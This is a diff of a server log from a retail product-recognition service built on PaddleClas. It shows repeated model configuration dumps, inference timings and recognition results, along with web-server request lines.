/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:42:51 INFO: return_k : 5 -2021-11-03 04:42:51 INFO: score_thres : 0.5 -2021-11-03 04:42:51 INFO: RecPostProcess : None -2021-11-03 04:42:51 INFO: RecPreProcess : -2021-11-03 04:42:51 INFO: transform_ops : -2021-11-03 04:42:51 INFO: ResizeImage : -2021-11-03 04:42:51 INFO: size : 224 -2021-11-03 04:42:51 INFO: NormalizeImage : -2021-11-03 04:42:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:42:51 INFO: order : -2021-11-03 04:42:51 INFO: scale : 0.00392157 -2021-11-03 04:42:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:42:51 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2293.3998107910156 ms per batch image -[{'bbox': [5, 0, 631, 479], 'rec_docs': '江小白', 'rec_scores': 0.58137244}] -{'bbox': [5, 0, 631, 479], 'rec_docs': '江小白', 'rec_scores': 0.58137244} +2022-02-14 08:52:13 INFO: DetPostProcess : +2022-02-14 08:52:13 INFO: DetPreProcess : +2022-02-14 08:52:13 INFO: transform_ops : +2022-02-14 08:52:13 INFO: DetResize : +2022-02-14 08:52:13 INFO: interp : 2 +2022-02-14 08:52:13 INFO: keep_ratio : False +2022-02-14 08:52:13 INFO: target_size : [640, 640] +2022-02-14 08:52:13 INFO: DetNormalizeImage : +2022-02-14 08:52:13 INFO: is_scale : True +2022-02-14 08:52:13 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:13 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:13 INFO: DetPermute : +2022-02-14 08:52:13 INFO: Global : +2022-02-14 08:52:13 INFO: batch_size : 1 +2022-02-14 08:52:13 INFO: cpu_num_threads : 1 +2022-02-14 08:52:13 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:13 INFO: enable_benchmark : True +2022-02-14 08:52:13 INFO: enable_mkldnn : True +2022-02-14 08:52:13 INFO: enable_profile : False +2022-02-14 08:52:13 INFO: gpu_mem : 8000 +2022-02-14 08:52:13 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:13 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:13 INFO: ir_optim : True +2022-02-14 08:52:13 INFO: labe_list : ['foreground'] +2022-02-14 08:52:13 INFO: max_det_results : 5 +2022-02-14 08:52:13 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:13 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:13 INFO: threshold : 0.2 +2022-02-14 08:52:13 INFO: use_fp16 : False +2022-02-14 08:52:13 INFO: use_gpu : False +2022-02-14 08:52:13 INFO: use_tensorrt : False +2022-02-14 08:52:13 INFO: IndexProcess : +2022-02-14 08:52:13 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:13 INFO: return_k : 5 +2022-02-14 08:52:13 INFO: score_thres : 0.5 +2022-02-14 08:52:13 INFO: RecPostProcess : None +2022-02-14 08:52:13 INFO: RecPreProcess : +2022-02-14 08:52:13 INFO: transform_ops : +2022-02-14 08:52:13 INFO: ResizeImage : +2022-02-14 08:52:13 INFO: size : 224 +2022-02-14 08:52:13 INFO: NormalizeImage : +2022-02-14 08:52:13 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:13 INFO: order : +2022-02-14 08:52:13 INFO: scale : 0.00392157 +2022-02-14 08:52:13 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:13 INFO: ToCHWImage : None +Inference: 381.20031356811523 ms per batch image +[] 234 -["{'bbox': [5, 0, 631, 479], 'rec_docs': '江小白', 'rec_scores': 0.58137244}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 17/31] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:42:50 2021] POST /reference_client/ => generated 114 bytes in 6117 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) -[pid: 32765|app: 0|req: 18/32] 205.185.120.103 () {40 vars in 569 bytes} [Wed Nov 3 04:46:36 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 19/33] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 04:50:22 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 13/34] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 04:50:24 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 
switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1137/1331] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:52:12 2022] POST /reference_client/ => generated 98 bytes in 3053 msecs (HTTP/1.1 200) 5 headers in 157 bytes (23 switches on core 0) req -2021-11-03 04:59:10 INFO: +2022-02-14 08:52:28 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2801,78 +4932,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:59:10 INFO: DetPostProcess : -2021-11-03 04:59:10 INFO: DetPreProcess : -2021-11-03 04:59:10 INFO: transform_ops : -2021-11-03 04:59:10 INFO: DetResize : -2021-11-03 04:59:10 INFO: interp : 2 -2021-11-03 04:59:10 INFO: keep_ratio : False -2021-11-03 04:59:10 INFO: target_size : [640, 640] -2021-11-03 04:59:10 INFO: DetNormalizeImage : -2021-11-03 04:59:10 INFO: is_scale : True -2021-11-03 04:59:10 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:10 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:10 INFO: DetPermute : -2021-11-03 04:59:10 INFO: Global : -2021-11-03 04:59:10 INFO: batch_size : 1 -2021-11-03 04:59:10 INFO: cpu_num_threads : 10 -2021-11-03 04:59:10 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:59:10 INFO: enable_benchmark : True -2021-11-03 04:59:10 INFO: enable_mkldnn : True -2021-11-03 04:59:10 INFO: enable_profile : False -2021-11-03 04:59:10 INFO: gpu_mem : 8000 -2021-11-03 04:59:10 INFO: image_shape : [3, 640, 640] -2021-11-03 04:59:10 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:59:10 INFO: ir_optim : True -2021-11-03 04:59:10 INFO: labe_list : ['foreground'] -2021-11-03 04:59:10 INFO: max_det_results : 5 
-2021-11-03 04:59:10 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:59:10 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:59:10 INFO: threshold : 0.2 -2021-11-03 04:59:10 INFO: use_fp16 : False -2021-11-03 04:59:10 INFO: use_gpu : False -2021-11-03 04:59:10 INFO: use_tensorrt : False -2021-11-03 04:59:10 INFO: IndexProcess : -2021-11-03 04:59:10 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:59:10 INFO: return_k : 5 -2021-11-03 04:59:10 INFO: score_thres : 0.5 -2021-11-03 04:59:10 INFO: RecPostProcess : None -2021-11-03 04:59:10 INFO: RecPreProcess : -2021-11-03 04:59:10 INFO: transform_ops : -2021-11-03 04:59:10 INFO: ResizeImage : -2021-11-03 04:59:10 INFO: size : 224 -2021-11-03 04:59:10 INFO: NormalizeImage : -2021-11-03 04:59:10 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:10 INFO: order : -2021-11-03 04:59:10 INFO: scale : 0.00392157 -2021-11-03 04:59:10 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:10 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2347.242832183838 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6235545}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6235545} +2022-02-14 08:52:28 INFO: DetPostProcess : +2022-02-14 08:52:28 INFO: DetPreProcess : +2022-02-14 08:52:28 INFO: transform_ops : +2022-02-14 08:52:28 INFO: DetResize : +2022-02-14 08:52:28 INFO: interp : 2 +2022-02-14 08:52:28 INFO: keep_ratio : False +2022-02-14 08:52:28 INFO: target_size : [640, 640] +2022-02-14 08:52:28 INFO: DetNormalizeImage : +2022-02-14 08:52:28 INFO: is_scale : True +2022-02-14 08:52:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:28 INFO: DetPermute : +2022-02-14 08:52:28 INFO: Global : +2022-02-14 08:52:28 INFO: batch_size : 1 +2022-02-14 08:52:28 INFO: cpu_num_threads : 1 +2022-02-14 08:52:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:28 INFO: enable_benchmark : True +2022-02-14 08:52:28 INFO: enable_mkldnn : True +2022-02-14 08:52:28 INFO: enable_profile : False +2022-02-14 08:52:28 INFO: gpu_mem : 8000 +2022-02-14 08:52:28 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:28 INFO: ir_optim : True +2022-02-14 08:52:28 INFO: labe_list : ['foreground'] +2022-02-14 08:52:28 INFO: max_det_results : 5 +2022-02-14 08:52:28 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:28 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:28 INFO: threshold : 0.2 +2022-02-14 08:52:28 INFO: use_fp16 : False +2022-02-14 08:52:28 INFO: use_gpu : False +2022-02-14 08:52:28 INFO: use_tensorrt : False +2022-02-14 08:52:28 INFO: IndexProcess : +2022-02-14 08:52:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:28 INFO: return_k : 5 +2022-02-14 08:52:28 INFO: score_thres : 0.5 +2022-02-14 08:52:28 INFO: RecPostProcess : None +2022-02-14 08:52:28 INFO: RecPreProcess : +2022-02-14 08:52:28 INFO: transform_ops : +2022-02-14 08:52:28 INFO: ResizeImage : +2022-02-14 08:52:28 INFO: size : 224 +2022-02-14 08:52:28 INFO: NormalizeImage : +2022-02-14 08:52:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:28 INFO: order : +2022-02-14 08:52:28 INFO: scale : 0.00392157 +2022-02-14 08:52:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:28 INFO: ToCHWImage : None +Inference: 378.4329891204834 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6235545}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 20/35] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:59:09 2021] POST /reference_client/ => generated 114 bytes in 6021 msecs (HTTP/1.1 200) 5 headers in 158 bytes (5 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1138/1332] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:52:26 2022] POST /reference_client/ => generated 98 bytes in 2967 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) req -2021-11-03 04:59:23 INFO: +2022-02-14 08:52:46 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -2882,78 +4994,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:59:23 INFO: DetPostProcess : -2021-11-03 04:59:23 INFO: DetPreProcess : -2021-11-03 04:59:23 INFO: transform_ops : -2021-11-03 04:59:23 INFO: DetResize : -2021-11-03 04:59:23 INFO: interp : 2 -2021-11-03 04:59:23 INFO: keep_ratio : False -2021-11-03 04:59:23 INFO: target_size : [640, 640] -2021-11-03 04:59:23 INFO: DetNormalizeImage : -2021-11-03 04:59:23 INFO: is_scale : True -2021-11-03 04:59:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:23 INFO: DetPermute : -2021-11-03 04:59:23 INFO: Global : -2021-11-03 04:59:23 INFO: batch_size : 1 -2021-11-03 04:59:23 INFO: cpu_num_threads : 10 -2021-11-03 04:59:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:59:23 INFO: enable_benchmark : True -2021-11-03 04:59:23 INFO: enable_mkldnn : True -2021-11-03 04:59:23 INFO: enable_profile : False -2021-11-03 04:59:23 INFO: gpu_mem : 8000 -2021-11-03 04:59:23 INFO: image_shape : [3, 640, 640] -2021-11-03 04:59:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:59:23 INFO: ir_optim : True -2021-11-03 04:59:23 INFO: labe_list : ['foreground'] -2021-11-03 04:59:23 INFO: max_det_results : 5 -2021-11-03 04:59:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:59:23 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:59:23 INFO: threshold : 0.2 -2021-11-03 04:59:23 INFO: use_fp16 : False -2021-11-03 04:59:23 INFO: use_gpu : False -2021-11-03 04:59:23 INFO: use_tensorrt : False -2021-11-03 04:59:23 INFO: IndexProcess : -2021-11-03 04:59:23 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:59:23 INFO: return_k : 5 -2021-11-03 04:59:23 INFO: score_thres : 0.5 -2021-11-03 04:59:23 INFO: RecPostProcess : None -2021-11-03 04:59:23 INFO: RecPreProcess : -2021-11-03 04:59:23 INFO: transform_ops : -2021-11-03 04:59:23 INFO: ResizeImage : -2021-11-03 04:59:23 INFO: size : 224 -2021-11-03 04:59:23 INFO: NormalizeImage : -2021-11-03 04:59:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:23 INFO: order : -2021-11-03 04:59:23 INFO: scale : 0.00392157 -2021-11-03 04:59:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:23 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2292.2866344451904 ms per batch image -[{'bbox': [25, 312, 392, 479], 'rec_docs': '江小白', 'rec_scores': 0.5136571}] -{'bbox': [25, 312, 392, 479], 'rec_docs': '江小白', 'rec_scores': 0.5136571} +2022-02-14 08:52:46 INFO: DetPostProcess : +2022-02-14 08:52:46 INFO: DetPreProcess : +2022-02-14 08:52:46 INFO: transform_ops : +2022-02-14 08:52:46 INFO: DetResize : +2022-02-14 08:52:46 INFO: interp : 2 +2022-02-14 08:52:46 INFO: keep_ratio : False +2022-02-14 08:52:46 INFO: target_size : [640, 640] +2022-02-14 08:52:46 INFO: DetNormalizeImage : +2022-02-14 08:52:46 INFO: is_scale : True +2022-02-14 08:52:46 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:46 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:46 INFO: DetPermute : +2022-02-14 08:52:46 INFO: Global : +2022-02-14 08:52:46 INFO: batch_size : 1 +2022-02-14 08:52:46 INFO: cpu_num_threads : 1 +2022-02-14 08:52:46 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:46 INFO: enable_benchmark : True +2022-02-14 08:52:46 INFO: enable_mkldnn : True +2022-02-14 08:52:46 INFO: enable_profile : False +2022-02-14 08:52:46 INFO: gpu_mem : 8000 +2022-02-14 08:52:46 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:46 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:46 INFO: ir_optim : True +2022-02-14 08:52:46 INFO: labe_list : ['foreground'] +2022-02-14 08:52:46 INFO: max_det_results : 5 +2022-02-14 08:52:46 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:46 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:46 INFO: threshold : 0.2 +2022-02-14 08:52:46 INFO: use_fp16 : False +2022-02-14 08:52:46 INFO: use_gpu : False +2022-02-14 08:52:46 INFO: use_tensorrt : False +2022-02-14 08:52:46 INFO: IndexProcess : +2022-02-14 08:52:46 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:46 INFO: return_k : 5 +2022-02-14 08:52:46 INFO: score_thres : 0.5 +2022-02-14 08:52:46 INFO: RecPostProcess : None +2022-02-14 08:52:46 INFO: RecPreProcess : +2022-02-14 08:52:46 INFO: transform_ops : +2022-02-14 08:52:46 INFO: ResizeImage : +2022-02-14 08:52:46 INFO: size : 224 +2022-02-14 08:52:46 INFO: NormalizeImage : +2022-02-14 08:52:46 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:46 INFO: order : +2022-02-14 08:52:46 INFO: scale : 0.00392157 +2022-02-14 08:52:46 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:46 INFO: ToCHWImage : None +Inference: 374.09257888793945 ms per batch image +[] 234 -["{'bbox': [25, 312, 392, 479], 'rec_docs': '江小白', 'rec_scores': 0.5136571}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 14/36] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:59:22 2021] POST /reference_client/ => generated 114 bytes in 5835 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19144|app: 0|req: 18/1333] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:52:44 2022] POST /reference_client/ => generated 98 bytes in 2907 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) req -2021-11-03 04:59:36 INFO: +2022-02-14 08:52:54 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -2963,78 +5056,66 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:59:36 INFO: DetPostProcess : -2021-11-03 04:59:36 INFO: DetPreProcess : -2021-11-03 04:59:36 INFO: transform_ops : -2021-11-03 04:59:36 INFO: DetResize : -2021-11-03 04:59:36 INFO: interp : 2 -2021-11-03 04:59:36 INFO: keep_ratio : False -2021-11-03 04:59:36 INFO: target_size : [640, 640] -2021-11-03 04:59:36 INFO: DetNormalizeImage : -2021-11-03 04:59:36 INFO: is_scale : True -2021-11-03 04:59:36 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:36 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:36 INFO: DetPermute : -2021-11-03 04:59:36 INFO: Global : -2021-11-03 04:59:36 INFO: batch_size : 1 -2021-11-03 04:59:36 INFO: cpu_num_threads : 10 -2021-11-03 04:59:36 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:59:36 INFO: enable_benchmark : True -2021-11-03 04:59:36 INFO: enable_mkldnn : True -2021-11-03 04:59:36 INFO: enable_profile : False -2021-11-03 04:59:36 INFO: gpu_mem : 8000 -2021-11-03 04:59:36 INFO: image_shape : [3, 640, 640] -2021-11-03 04:59:36 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:59:36 INFO: ir_optim : True -2021-11-03 04:59:36 INFO: labe_list : ['foreground'] -2021-11-03 04:59:36 INFO: max_det_results : 5 -2021-11-03 04:59:36 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:59:36 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:59:36 INFO: threshold : 0.2 -2021-11-03 04:59:36 INFO: use_fp16 : False -2021-11-03 04:59:36 INFO: use_gpu : False -2021-11-03 04:59:36 INFO: use_tensorrt : False -2021-11-03 04:59:36 INFO: IndexProcess : -2021-11-03 04:59:36 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:59:36 INFO: return_k : 5 -2021-11-03 04:59:36 INFO: score_thres : 0.5 -2021-11-03 04:59:36 INFO: RecPostProcess : None -2021-11-03 04:59:36 INFO: RecPreProcess : -2021-11-03 04:59:36 INFO: transform_ops : -2021-11-03 04:59:36 INFO: ResizeImage : -2021-11-03 04:59:36 INFO: size : 224 -2021-11-03 04:59:36 INFO: NormalizeImage : -2021-11-03 04:59:36 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:36 INFO: order : -2021-11-03 04:59:36 INFO: scale : 0.00392157 -2021-11-03 04:59:36 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:36 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2478.148937225342 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5989687}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5989687} +2022-02-14 08:52:54 INFO: DetPostProcess : +2022-02-14 08:52:54 INFO: DetPreProcess : +2022-02-14 08:52:54 INFO: transform_ops : +2022-02-14 08:52:54 INFO: DetResize : +2022-02-14 08:52:54 INFO: interp : 2 +2022-02-14 08:52:54 INFO: keep_ratio : False +2022-02-14 08:52:54 INFO: target_size : [640, 640] +2022-02-14 08:52:54 INFO: DetNormalizeImage : +2022-02-14 08:52:54 INFO: is_scale : True +2022-02-14 08:52:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:54 INFO: DetPermute : +2022-02-14 08:52:54 INFO: Global : +2022-02-14 08:52:54 INFO: batch_size : 1 +2022-02-14 08:52:54 INFO: cpu_num_threads : 1 +2022-02-14 08:52:54 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:54 INFO: enable_benchmark : True +2022-02-14 08:52:54 INFO: enable_mkldnn : True +2022-02-14 08:52:54 INFO: enable_profile : False +2022-02-14 08:52:54 INFO: gpu_mem : 8000 +2022-02-14 08:52:54 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:54 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:54 INFO: ir_optim : True +2022-02-14 08:52:54 INFO: labe_list : ['foreground'] +2022-02-14 08:52:54 INFO: max_det_results : 5 +2022-02-14 08:52:54 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:54 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:54 INFO: threshold : 0.2 +2022-02-14 08:52:54 INFO: use_fp16 : False +2022-02-14 08:52:54 INFO: use_gpu : False +2022-02-14 08:52:54 INFO: use_tensorrt : False +2022-02-14 08:52:54 INFO: IndexProcess : +2022-02-14 08:52:54 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:54 INFO: return_k : 5 +2022-02-14 08:52:54 INFO: score_thres : 0.5 +2022-02-14 08:52:54 INFO: RecPostProcess : None +2022-02-14 08:52:54 INFO: RecPreProcess : +2022-02-14 08:52:54 INFO: transform_ops : +2022-02-14 08:52:54 INFO: ResizeImage : +2022-02-14 08:52:54 INFO: size : 224 +2022-02-14 08:52:54 INFO: NormalizeImage : +2022-02-14 08:52:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:54 INFO: order : +2022-02-14 08:52:54 INFO: scale : 0.00392157 +2022-02-14 08:52:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:54 INFO: ToCHWImage : None +Inference: 372.9250431060791 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5989687}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 21/37] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:59:35 2021] POST /reference_client/ => generated 114 bytes in 6470 msecs (HTTP/1.1 200) 5 headers in 158 bytes (15 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1139/1334] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:52:53 2022] POST /reference_client/ => generated 98 bytes in 2972 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) +[pid: 19148|app: 0|req: 1140/1335] 39.99.143.235 () {28 vars in 307 bytes} [Mon Feb 14 08:53:07 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 44/1336] 39.99.143.235 () {32 vars in 409 bytes} [Mon Feb 14 
